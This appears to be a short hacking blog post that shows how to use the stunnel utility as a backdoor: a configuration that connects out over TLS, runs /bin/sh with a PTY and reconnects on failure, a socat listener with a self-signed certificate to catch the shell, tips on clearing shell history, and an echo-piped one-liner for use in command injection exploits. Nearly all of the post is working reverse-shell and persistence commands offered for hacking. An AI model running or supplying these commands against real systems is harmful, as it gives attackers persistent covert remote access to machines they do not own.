Just a quick post, something I came across today, and after a bit of experimenting, got working. In this post I’ll show you a neat “living off the land” trick, using the “stunnel” utility as a “backdoor” of sorts, delivering you a reverse shell over SSL to a socat listener. Even better – you can set it to repeatedly reconnect in case you lose your shell.
“stunnel” is a utility for creating SSL tunnels/proxies, and can be used to “wrap” a service that doesn’t support SSL in a layer of magic crypto sellotape. Its manual page is (as usual, for manual pages) among the most user-hostile piles of trash I’ve had the displeasure of spending an hour reading, but you probably should give it a skim through anyway.
The “stunnel” configuration file we will be creating effectively tells “stunnel” to connect to our server using TLS, execute
/bin/sh, and launch a PTY. It also tells it to reconnect if the connection fails, giving us a stable means of access. I haven’t worked out how to make it use delays or whatnot, but whatever. It does log to a file in /tmp for debugging, but you can always remove that or redirect it to /dev/null.
output=/tmp/stuntest.txt pid=/tmp/stun.pid [service] client=yes connect=127.0.0.1:4443 exec=/bin/sh pty=yes retry=yes
To run this, simply run the command
stunnel file.conf and away it goes.
For catching our shells, we will be using the “socat” utility. You will also want to have installed the “openssl” commandline tool for generating a certificate to use.
To generate a cert, there are loads of ways to do this. Below I just show a quick and dirty way nicked from a blog.
# ref: https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/ openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.example.com/O=My Company Name LTD./C=US' -out bind.crt cat bind.key bind.crt > bind.pem
Now to run your listener, we simply invoke the following socat incantation… Which will catch the shell, and give you a mostly functional TTY. To “fix” it and get a fully working one, just run
script /dev/null once you catch the shell, and don’t forget to unset histfile and all that.
socat file:`tty`,echo=0,raw OPENSSL-LISTEN:4443,verify=0,cert=bind.pem
Hopefully someone finds this interesting or useful – oftentimes on some weird embedded devices you will find “stunnel” available, but no netcat or other utils that you could use for a shell. Consider it another vegetable of the land you can use when hacking.
Also, one final note… “stunnel” can take its config file from stdin, so you can use this as an oneliner in command injection exploits, for example. Just do like below…
echo -ne "output=/tmp/stuntest.txt\x0apid=/tmp/stun.pid\x0a[service]\x0aclient=yes\x0aconnect=127.0.0.1:4443\x0aexec=/bin/sh\x0apty=yes\x0aretry=yes" | stunnel -fd 0